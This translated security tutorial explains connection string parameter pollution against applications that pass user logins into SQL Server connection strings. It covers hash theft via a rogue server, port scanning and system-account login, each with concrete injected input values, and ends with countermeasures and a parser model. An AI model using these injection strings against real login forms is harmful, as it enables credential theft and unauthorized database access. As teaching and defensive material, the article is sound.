
How to analyze CSPP connection string parameter contamination attack

2025-02-24 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

Many newcomers are unclear about how to analyze CSPP (connection string parameter pollution) attacks. To help with that, the following is a detailed explanation for anyone who needs it; I hope you gain something from it.

Connection string parameter contamination attack

SQL injection is the most common injection attack; it exploits implementation defects in the way a web application builds and issues database queries.

CSPP attacks, as the name implies, instead exploit design flaws in how the application connects to the database.

With the way web application data access has evolved, CSPP attacks have gradually faded from public attention.

(CSPP: Connection String Parameter Pollution attacks)

0X01 Web application authentication delegation

The authentication system of a typical web application has two implementation structures:

1. Build their own credential authentication system (common in web applications)

2. Delegate authentication to the database engine (currently common in intranet applications)

In most cases, application developers choose to use only one user to connect to the database.

From the database side, this database user represents the entire web application, and the web application will use this database connection to implement SQL queries against the custom user table that stores the application's user identity credentials.

Figure 1. Common web application authentication architecture

Web application login process diagram

1. The web application connects to the database with its own credentials

2. It queries the user's login information

3. It checks the login information stored in the custom user table

Because the web application is identified by a single database user who can access the entire application content in the database, it is not possible to implement granular permissions on different database objects or to track the actions of each individual user at the database level; those tasks fall to the web application itself. This architecture is common and is found in widely used CMS systems such as Joomla, Mambo and many others. Typically the attacker's goal is to obtain the application's user credentials from the users table in the database.

The other approach is to delegate authentication to the database engine: the connection string no longer contains a fixed set of credentials but uses the credentials entered by the user, leaving the database engine responsible for checking them.

This delegated authentication is often preferred by database administrators, because a user who connects through the application can only access and control the objects and operations for which they have permissions. With this architecture, a fine-grained permission system can be implemented and users' operations can be tracked in the database.

Figure 2. Web application delegated authentication architecture

The database engine manages the login process

1. The web application asks for input credentials

2. The connection string is built from the input credentials and used to connect to the database

3. The role and permissions of the session are determined by the user named in the connection string

The CSPP attacks described in this article focus on the second environment: delegating authentication to the database engine.

Tips: the second architecture is commonly used in older intranet client applications.

0X02 connection string

The connection string is used to connect the application to the database engine.

It specifies the server and port to connect, the database name, authentication credentials, and some connection configuration parameters, such as timeout, alternative database, communication protocol, or encryption options.

A normal connection string for connecting to a Microsoft SQL Server database:

"Data Source=Server, Port; Network Library=DBMSSOCN;Initial Catalog=DataBase; User ID=Username; Password=pwd;"

As shown in the example, a connection string is a set of parameters separated by a semicolon (;), each of which is a key-value pair.

The connection string syntax of the default SQL Server client provider is the same regardless of the SQL Server version (7, 2000 and 2008).

0X03 connection string injection

In a delegated authentication environment, the connection string injection technique lets an attacker inject additional parameters by appending a semicolon (;) followed by a new key-value pair to the value they control.

For example, where the user name and password entered by the user are used to create the connection string, an attacker can enter a password such as "pwd;Encryption=off", producing the following connection string:

"Data Source=Server, Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd; Encryption=off"

When the connection string is built, the injected Encryption parameter is added to the previously configured parameter set.

0X04 connection string parameter pollution

Parameter pollution techniques are used to override the values of parameters. They are well known in HTTP environments [5], but they also apply elsewhere. Here the parameter pollution technique is applied to the parameters of the connection string, enabling several attacks.

Example scenario:

1. A web application running on a Windows IIS web server

2. A user name [User_Value] and a password [Password_Value] are required for user authentication.

3. The application uses the credentials entered by the user to build a connection string to the SQL Server database

As follows (the +'...'+ notation marks where the user-supplied values are concatenated in):

Data source=SQL2005; initial catalog=dbl; integrated security=no; user id=+'User_Value'+; Password=+'Password_Value'+

This connection string shows how the application connects to the SQL Server database engine.

Knowing this, an attacker can perform a connection string parameter contamination attack.

The idea of this attack is to add a parameter with the desired value to the connection string, regardless of whether that parameter already exists in the string with a value already set.

When a .NET application builds a connection, it takes the value of the last occurrence of a parameter in the connection string.

That is, if the connection string contains two parameters with the key "Data Source", the value of the last pair is used, which enables the following CSPP attack vectors:

0X05 CSPP attack 1: Hash theft

An attacker can place a rogue SQL Server on the Internet and run an SQL Server credential sniffer on it (Cain is used in this example).

The attacker can then carry out the following CSPP attack:

User_Value: Data Source=Rogue_Server (rogue server address)

Password_Value: Integrated Security=true (enable integrated security)

Concatenation produces the following connection string:

Data source=SQL2005; initial catalog=dbl; integrated security=no; user id=;Data Source=Rogue_Server; Password=;Integrated Security=true

The "Data Source" and "Integrated Security" parameters are overridden, so the SQL Server native driver uses the last set of values and ignores the previous ones.

At this point the application attempts to connect to the rogue server using the Windows credentials it runs under, which may be a system account or the application pool account. By sniffing on the rogue server, the attacker obtains the credentials used by the web application.

0X06 example 1: ASP.NET Enterprise Manager

ASP.NET Enterprise Manager is an abandoned, unsupported open-source tool for managing SQL Server databases through a web interface; it is still available from sites such as SourceForge.

Figure 3. Using CSPP to steal account information in ASP.NET Enterprise Manager

Figure 4. Cain running on the rogue server collects the hash

Main steps of the hash theft:

1. Construct a request that makes the server initiate a connection to the rogue server with its default authentication information.

2. As a result, the application sends its credentials to the rogue server, where the database connection sniffer is installed.

3. The sniffer (Cain) collects the LM hashes, which allow access to the account.

Tips: other credential sniffing tools, such as Responder, can be used nowadays.

0X07 CSPP attack 2: Port scan

One valid parameter in the connection string is the port to connect to.

An attacker can scan servers on an internal or external network by changing the port number, trying to connect to different ports and comparing the error messages returned:

Injected input values:

User_Value: Data Source=Target_Server, Target_Port

Password_Value: Integrated Security=true

This input results in the following connection string:

Data source=SQL2005; initial catalog=dbl; integrated security=no; user id=;Data Source=Target_Server, Target_Port; Password=; Integrated Security=true

This connection string ignores the first "Data Source" parameter and uses the last one, which means the web application will try to connect to port "Target_Port" on the "Target_Server" machine.

Observing the differences in the error messages returned allows a port scan to be performed.

0x08 example 2: myLittleAdmin and myLittleBackup

myLittleAdmin and myLittleBackup are both commercial tools developed by myLittleTools. Both are vulnerable to CSPP attacks in versions prior to myLittleAdmin 3.5 and myLittleBackup 1.6.

Figure 5. A connection to www.google.com through port 80 can be established

Figure 6. A connection to www.google.com through port XX cannot be established

Port scan analysis process:

As shown in figure 5, when the port is listening (open), the error message says that no Microsoft SQL Server is listening, but the TCP connection was established successfully, which indicates that the port is open.

As shown in figure 6, when the port is closed, the TCP connection cannot be completed and the error message differs. Using these error messages, a full TCP port scan of the server can be run.

0x09 CSPP attack 3: hijacking web credentials

An attacker can attempt to connect to the database through the web application using its system account, without having to provide any account password:

Input values:

User_Value: Data Source=Target_Server (target server)

Password_Value: Integrated Security=true (enable integrated security)

These injected values produce the following connection string:

Data source=SQL2005; initial catalog=dbl; integrated security=no; user id=;Data Source=Target_Server, Target_Port; Password=;Integrated Security=true

This time the "Integrated Security" parameter is overridden with the value "true".

This means the system will attempt to connect to the database using the system account under which the tool is running.

In this case, that is the system account used by the web application on the web server.

PS: for the Integrated Security attribute, see the appendix.

0x10 example 3: SQL Server Web Data Administrator

The version of SQL Server Web Data Administrator published on Microsoft's website is vulnerable to CSPP attacks.

The screenshots below show how the system can be accessed with this type of attack.

Figure 7. Entering credentials in the Web Data Administrator tool

Figure 8. Console access with the server account

Figure 9. System account access authorization

In figure 7, the password value is as described above: Integrated Security=true.

In figure 8, the attacker has logged in to the web application and can manage the entire system.

As shown in figure 9, the root cause of the vulnerability is that all users and the network service account can access the server.

0x11 Integrated security introduction

Example of a typical database connection string:

string constr = "Data Source=(local); Initial Catalog=data; Integrated Security=true";

Integrated Security=false (default)

The correct database login name and password must be supplied before login authentication can take place.

Integrated Security=true

The connection authenticates with the credentials of the current application process, without needing a database user name and password.

By crafting a CSPP payload that overrides Integrated Security to true, hash theft, password-less login and similar effects can be achieved.

0x12 other database connection strings

These techniques also apply to other database engines.

For example, Oracle allows administrators to configure integrated security in the database. In addition, in an Oracle connection string the way users connect can be changed by forcing a sysdba session.

MySQL does not allow administrators to configure integrated security authentication. However, it is still possible to inject into and manipulate connection strings to try to connect to an internal server that is not exposed to the Internet.

Connection strings for various databases

MySQL

"Server=localhost;Database=mytest;User=root;Password=;Port=3306;Charset=utf8"

SQL Server

"Database=MyData;Data Source=NICKYAN-PC;User Id=sa;Password=123123;"

Oracle

"Data Source=NICKYAN-PC;User Id=PB_DB_USER;Password=123123;Integrated Security=no"

OleDB

"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=RedGlovePermission.Web\DB\MyData.mdb;Persist Security Info=False"


0X13 Countermeasures

Microsoft released the ConnectionStringBuilder classes to avoid such attacks, but not all projects have been updated to use these newer, safer components. To avoid these attacks, semicolon characters must be filtered out of user input, every parameter must be sanitized, and the firewall must be hardened not only to filter inbound connections but also to block outbound connections from internal servers that would send NTLM credentials to the Internet.
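An added example (my own constructed code, not from the article or from any tool it names) that models the last-occurrence-wins parsing described in 0X04, replays the hash-theft input from 0X05 through the article's concatenation pattern, and shows how the value quoting a connection string builder performs (the 0X13 countermeasure) keeps the same input inside the user id and password values. The SYNONYMS table, the attacker constants (with the leading ';' that the article's resulting string "user id=;Data Source=Rogue_Server" implies) and the simplified quoting rule are assumptions.

```python
# Constructed model, not code from the article. It reproduces the two parsing
# facts the article relies on (keywords are case-insensitive and the last
# occurrence of a keyword wins) and contrasts the article's concatenation
# pattern with builder-style construction that quotes values. The real
# SqlClient provider knows many more keyword aliases than SYNONYMS lists.
SYNONYMS = {"server": "data source", "database": "initial catalog",
            "trusted_connection": "integrated security", "uid": "user id",
            "pwd": "password"}

def parse_connection_string(cs):
    """Split on ';' outside quotes, normalise keywords, last occurrence wins."""
    result, token, quote = {}, "", None
    for ch in cs + ";":                  # trailing ';' flushes the final pair
        if quote:                        # inside quotes ';' and '=' are literal
            if ch == quote:
                quote = None
            else:
                token += ch
        elif ch in "'\"":
            quote = ch
        elif ch == ";":
            if "=" in token:
                key, _, value = token.partition("=")
                key = key.strip().lower()
                result[SYNONYMS.get(key, key)] = value.strip()
            token = ""
        else:
            token += ch
    return result

def vulnerable_build(user_value, password_value):
    """The article's pattern (section 0X04): raw concatenation of form input."""
    return ("Data source=SQL2005; initial catalog=dbl; integrated security=no; "
            "user id=" + user_value + "; Password=" + password_value)

def hardened_build(user_value, password_value):
    """Quote every value so ';' or '=' inside it stays part of the value, which
    is what SqlConnectionStringBuilder does for you in .NET."""
    def quote(v):
        if '"' in v and "'" in v:
            raise ValueError("value cannot contain both quote characters")
        q = "'" if '"' in v else '"'
        return q + v + q
    return ("Data source=SQL2005; initial catalog=dbl; integrated security=no; "
            "user id=" + quote(user_value) + "; Password=" + quote(password_value))

# Constructed input for the article's hash-theft vector. The leading ';' closes
# the empty 'user id=' pair, as the article's resulting string shows.
ATTACK_USER, ATTACK_PASSWORD = ";Data Source=Rogue_Server", ";Integrated Security=true"
```

Parsing vulnerable_build(ATTACK_USER, ATTACK_PASSWORD) yields Data Source Rogue_Server and Integrated Security true, while hardened_build with the same input leaves Data Source SQL2005 and Integrated Security no, with the payload sitting harmlessly inside the user id and password values.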
